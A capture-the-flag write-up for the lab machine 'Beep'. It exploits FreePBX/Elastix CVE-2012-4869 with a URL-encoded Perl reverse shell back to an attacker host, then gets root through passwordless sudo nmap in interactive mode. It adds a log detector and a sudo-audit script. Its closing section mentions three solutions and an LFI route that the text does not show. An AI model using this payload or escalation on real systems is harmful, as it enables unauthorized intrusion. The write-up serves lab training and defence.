# Beep Writeup

![](/files/iRx3PZTQMhYTg4hyv3VK)

**Vulnerability Exploited:** FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution (CVE-2012-4869)

**System Vulnerable:** 10.10.10.7

**Vulnerability Explanation:** The callme\_startcall function in recordings/misc/callme\_page.php in FreePBX 2.9, 2.10, and earlier allows remote attackers to execute arbitrary commands via the callmenum parameter in a c action.

**Vulnerability Fix:** Applying the unofficial patch eliminates this problem; the bugfix is available for download at archives.neohapsis.com. A possible mitigation was published before, not just after, the disclosure of the vulnerability.

**Privilege Escalation Vulnerability:** Misconfigured sudo permissions: the asterisk user can run /usr/bin/nmap as root without a password, and nmap's interactive mode can spawn a shell, which gives root.

**Vulnerability Fix:** The developer should have conformed to the principle of least privilege and the concept of separation of privileges.

**Severity:** <mark style="color:red;">**Critical**</mark>

An initial nmap scan revealed a large number of services, among them Apache httpd 2.2.3 on port 80 (redirecting to HTTPS on port 443) and Webmin on port 10000.

```
# Nmap 7.92 scan initiated Mon Dec 27 17:16:44 2021 as: nmap -sC -sV -v -oN nmap/initial 10.10.10.7
Nmap scan report for 10.10.10.7
Host is up (0.13s latency).
Not shown: 987 closed tcp ports (reset)
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp    open  http       Apache httpd 2.2.3
| http-methods: 
|_  Supported Methods: HEAD POST OPTIONS
|_http-title: Did not follow redirect to https://10.10.10.7/
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
111/tcp   open  rpcbind
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: STARTTLS OK Completed UIDPLUS ATOMIC LITERAL+ MAILBOX-REFERRALS IDLE THREAD=REFERENCES IMAP4 SORT LIST-SUBSCRIBED X-NETSCAPE ACL ID URLAUTHA0001 CATENATE ANNOTATEMORE UNSELECT LISTEXT NAMESPACE QUOTA SORT=MODSEQ THREAD=ORDEREDSUBJECT BINARY MULTIAPPEND CHILDREN RENAME RIGHTS=kxte CONDSTORE NO IMAP4rev1
443/tcp   open  ssl/http   Apache httpd 2.2.3 ((CentOS))
| http-methods: 
|_  Supported Methods: HEAD POST OPTIONS
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2017-04-07T08:22:08
| Not valid after:  2018-04-07T08:22:08
| MD5:   621a 82b6 cf7e 1afa 5284 1c91 60c8 fbc8
|_SHA-1: 800a c6e7 065e 1198 0187 c452 0d9b 18ef e557 a09f
|_ssl-date: 2021-12-27T23:18:02+00:00; +59m58s from scanner time.
880/tcp   open  unknown
993/tcp   open  ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
4445/tcp  open  upnotifyp?
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 74F7F6F633A027FA3EA36F05004C9341
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com

Host script results:
|_clock-skew: 59m57s

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Dec 27 17:21:27 2021 -- 1 IP address (1 host up) scanned in 283.74 seconds
```

The Elastix initial page

![](/files/QRBmn4Loa5S8aRZ7FAwk)

Searching for Elastix public exploits using searchsploit

![](/files/dNIMKZfpY5C9jHyV6M6w)

<https://www.exploit-db.com/exploits/18650>

Download the exploit script from the following link: <https://github.com/infosecjunky/FreePBX-2.10.0---Elastix-2.2.0---Remote-Code-Execution/blob/master/exploit.py>, then apply the needed changes as follows:

```
#exploit modified by infosecjunky
#https://infosecjunky.com

import urllib2
import ssl

rhost="10.10.10.7"
lhost="10.10.16.10"
lport=9001
extension="233"


ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE

# Reverse shell payload

url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'

… SNIP …
```
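As a defender-side companion to the injection shown above, here is an added example (not from this page or the infosecjunky exploit) that flags CVE-2012-4869 attempts against callme_page.php in Apache access logs; the log lines are constructed samples:

```python
"""Detect CVE-2012-4869 callme_page.php injection attempts in Apache access logs.

Added example for this writeup (not the page's exploit or FreePBX code).
SAMPLE_LOG holds constructed log lines in Apache combined format.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache combined log: client, identd, user, [timestamp], "request line", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d+)'
)

# Constructed samples: one injection attempt, one benign call, one unrelated hit.
SAMPLE_LOG = """\
10.10.16.10 - - [27/Dec/2021:17:30:01 -0500] "GET /recordings/misc/callme_page.php?action=c&callmenum=233@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20id HTTP/1.1" 200 512
10.10.16.11 - - [27/Dec/2021:17:31:12 -0500] "GET /recordings/misc/callme_page.php?action=c&callmenum=233 HTTP/1.1" 200 512
10.10.16.12 - - [27/Dec/2021:17:32:40 -0500] "GET /recordings/index.php HTTP/1.1" 200 2048
"""


def is_callme_injection(target: str) -> bool:
    """True for callme_page.php?action=c requests whose callmenum smuggles CRLF
    or an Asterisk manager 'Application:' header (the CVE-2012-4869 pattern)."""
    parts = urlsplit(target)
    if not parts.path.endswith("/recordings/misc/callme_page.php"):
        return False
    qs = parse_qs(parts.query, keep_blank_values=True)
    if qs.get("action", [""])[0] != "c":
        return False
    # parse_qs already decoded once; unquote again to catch double encoding.
    num = unquote(qs.get("callmenum", [""])[0])
    return "\r" in num or "\n" in num or "application:" in num.lower()


def find_suspicious(log_text: str) -> list:
    """Return the client, timestamp and target of every matching request."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_callme_injection(m.group("target")):
            hits.append({"ip": m.group("ip"), "ts": m.group("ts"), "target": m.group("target")})
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(f"[ALERT] {hit['ts']} {hit['ip']} {hit['target'][:70]}...")
```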

Launch a nc listener on the local machine and execute the exploit.

```
┌──(root💀kali)-[/root/htb/linux/beep]
└─# python exploit.py
```

Receiving a reverse shell as the asterisk user

```
┌──(root💀kali)-[/root/htb/linux/beep]
└─# nc -nlvp 9001                                                                                                1 ⨯
listening on [any] 9001 ...
connect to [10.10.16.10] from (UNKNOWN) [10.10.10.7] 40929
whoami
asterisk
```

Spawn a TTY shell using python

```
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
bash-3.2$
```

**user.txt**

```
bash-3.2$ cat user.txt  && hostname && whoami && ip a
cat user.txt  && hostname && whoami && ip a
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
beep
asterisk
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
    link/ether 00:50:56:b9:f6:86 brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.7/24 brd 10.10.10.255 scope global eth0
```

Run `sudo -l` to determine which commands the asterisk user can run with sudo.

```
bash-3.2$ sudo -l
sudo -l
Matching Defaults entries for asterisk on this host:
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR
    LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC
    LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
    XAUTHORITY"

User asterisk may run the following commands on this host:
    (root) NOPASSWD: /sbin/shutdown
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/bin/yum
    (root) NOPASSWD: /bin/touch
    (root) NOPASSWD: /bin/chmod
    (root) NOPASSWD: /bin/chown
    (root) NOPASSWD: /sbin/service
    (root) NOPASSWD: /sbin/init
    (root) NOPASSWD: /usr/sbin/postmap
    (root) NOPASSWD: /usr/sbin/postfix
    (root) NOPASSWD: /usr/sbin/saslpasswd2
    (root) NOPASSWD: /usr/sbin/hardware_detector
    (root) NOPASSWD: /sbin/chkconfig
    (root) NOPASSWD: /usr/sbin/elastix-helper
```

The user asterisk can run nmap as root without a password.

Run nmap in interactive mode and escalate to root.

```
bash-3.2$ sudo nmap --interactive
sudo nmap --interactive

Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
sh-3.2# whoami
whoami
root
sh-3.2#
```
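An added example (not from the original writeup) that audits `sudo -l` output like the listing above and flags the nmap entry as a known shell escape; SUDO_L_OUTPUT is a constructed excerpt in the same format:

```python
"""Audit `sudo -l` output for passwordless root commands with known shell escapes.
Added example for this writeup, not part of the original page; SUDO_L_OUTPUT is a
constructed excerpt in the same format as the box's sudo -l output."""
import re

SUDO_L_OUTPUT = """\
User asterisk may run the following commands on this host:
    (root) NOPASSWD: /sbin/shutdown
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /bin/touch
    (root) NOPASSWD: /usr/sbin/elastix-helper
"""

# Binaries whose normal features hand the caller a shell; nmap is the case this
# writeup shows (Nmap 4.11 --interactive, then !sh).
KNOWN_SHELL_ESCAPES = {
    "nmap": "interactive mode executes shell commands (--interactive, !sh)",
}

# Entry shape: "    (runas) TAG: /path/to/command [args]"
ENTRY_RE = re.compile(r"^\s+\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")


def parse_sudo_l(text: str) -> list:
    """Return one dict per command entry: run-as user, NOPASSWD flag, command."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            tags = m.group("tags").replace(":", " ").split()
            entries.append({"runas": m.group("runas").strip(),
                            "nopasswd": "NOPASSWD" in tags,
                            "cmd": m.group("cmd").strip()})
    return entries


def audit(entries: list) -> list:
    """Flag passwordless root entries; CRITICAL when the binary has a known shell escape."""
    findings = []
    for e in entries:
        if e["runas"] != "root" or not e["nopasswd"]:
            continue
        binary = e["cmd"].split()[0].rsplit("/", 1)[-1]
        reason = KNOWN_SHELL_ESCAPES.get(binary)
        findings.append({"cmd": e["cmd"], "severity": "CRITICAL" if reason else "REVIEW",
                         "reason": reason or "passwordless root execution; verify the binary cannot spawn a shell"})
    return findings


if __name__ == "__main__":
    for f in audit(parse_sudo_l(SUDO_L_OUTPUT)):
        print(f"{f['severity']:8} {f['cmd']}: {f['reason']}")
```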

**root.txt**

```
sh-3.2# cat root.txt  && hostname && whoami && ip a
cat root.txt  && hostname && whoami && ip a
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
beep
root
sh: ip: command not found
sh-3.2#
```


**Lessons Learned**

1. I presented three ways of rooting the machine. I know of at least two other ways (not presented in this writeup) to root the machine, including a neat solution by [ippsec](https://www.youtube.com/watch?v=XJmBpOd__N8) that involves sending a malicious email to a user of the machine and then executing that email using the LFI vulnerability we exploited in solution #2. I'm sure there are also many other ways that I didn't think of.
